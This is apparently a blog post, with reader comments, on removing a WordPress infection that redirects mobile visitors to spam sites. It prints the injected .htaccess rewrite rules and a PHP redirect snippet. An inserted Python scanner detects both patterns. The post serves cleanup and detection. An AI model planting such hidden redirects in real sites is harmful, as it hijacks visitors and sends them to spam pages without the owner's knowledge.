Cleaning a hacked WordPress site of a virus that redirects mobile visitors to a spam page

Scenario: when you visit a WordPress site from a mobile device, it redirects you to some shitty spam pages (e.g. http://luxurytds.com, http://load-app.org, …).

Solution 1: infected .htaccess files

First, check the .htaccess file in the website root. At the top of the file you may find lines like these:

RewriteEngine On
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal ...

RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s ...

RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]

Remove them, or, to be really sure, delete the .htaccess file and upload the original file from your local backup.

Secondly, you may find other .htaccess files in /wp-admin, /wp-content, /wp-includes and also in the folders of the domain root (e.g. /public, /private). Delete them.

Solution 2: infected index.php files

As the WordPress Codex says:

For instance, malicious redirects can often be found in files like .htaccess, and index.php at the root of your website. While others will focus on the wp-content/themes directory targeting index.php, header.php, footer.php and functions.php. These are the more simple variations of course.

The hack may have infected various files (mostly index.php) in your WP installation with code like this:

<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://mob-version.ru/");
die();
}
?>

Remove the malicious code or, as said, overwrite the whole file with your clean local copy. Overwriting the infected files can be a problem because the “hackers” set their permissions to 444. In that case, delete the infected file and re-upload it.

Notice: In both cases, eventually, flush the permalinks from WordPress > Settings > Permalinks > Save Changes
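
A small scanner for the two infection patterns described above (user-agent-conditioned redirects in .htaccess and in PHP files, plus the 444 permissions), added here as an example and not part of the original post. The `scan` and `demo` names, the regex heuristics and the `spam.example` sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics for the two patterns shown in the post; assumed, not exhaustive.
UA_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_USER_AGENT\}", re.I | re.M)
EXT_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://\S+\s+\[[^\]]*\bR\b", re.I | re.M)
PHP_UA = re.compile(r"HTTP_USER_AGENT")
PHP_REDIRECT = re.compile(r"header\s*\(\s*[\"']Location:\s*https?://", re.I)

def scan(root):
    """Return sorted (relative path, reason) pairs for suspicious files under root."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        if path.name == ".htaccess":
            marks, reason = (UA_COND, EXT_RULE), "user-agent redirect rule"
        elif path.suffix == ".php":
            marks, reason = (PHP_UA, PHP_REDIRECT), "user-agent redirect in PHP"
        else:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if all(m.search(text) for m in marks):
            rel = path.relative_to(root).as_posix()
            findings.append((rel, reason))
            if path.stat().st_mode & 0o777 == 0o444:  # read-only, as the post notes
                findings.append((rel, "permissions 444"))
    return sorted(findings)

def demo():
    """Scan a small constructed tree (sample data, not from a real site)."""
    samples = {
        ".htaccess": "RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} android|blazer [NC]\n"
                     "RewriteRule ^$ http://spam.example/go.php?sid=1 [R,L]\n",
        "wp-includes/.htaccess": "RewriteEngine On\nRewriteRule . /index.php [L]\n",
        "index.php": "<?php\n$ua = $_SERVER['HTTP_USER_AGENT'];\nif (stripos($ua, 'android')"
                     " !== false) { header(\"Location: http://spam.example/\"); die(); }\n",
        "wp-content/themes/x/functions.php": "<?php header('Location: /wp-login.php');\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        Path(root, "index.php").chmod(0o444)
        return scan(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Run `scan()` against a downloaded copy of the site; a clean WordPress .htaccess that only rewrites to /index.php is not reported.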

References

http://doktor-andy.de/wordpress/?p=799
http://wordpress.org/support/topic/problems-viewing-site-on-mobile-iphone-htaccess-related
http://codex.wordpress.org/FAQ_My_site_was_hacked

  • mekatronikmuhendisligi

    This virus infects .js files too, you should check that. I suggest downloading your whole directory and searching it with Linux terminal commands, or you can use batch folder search programs under Windows. You can try different words like android, blazer, luxury etc.
    1. grep -r "blazer" /your/directory
    2. grep -r "android" /your/directory

  • Thanks man, your blog helped me out..!


Developed and designed by Netgloo
© 2019 Netgloo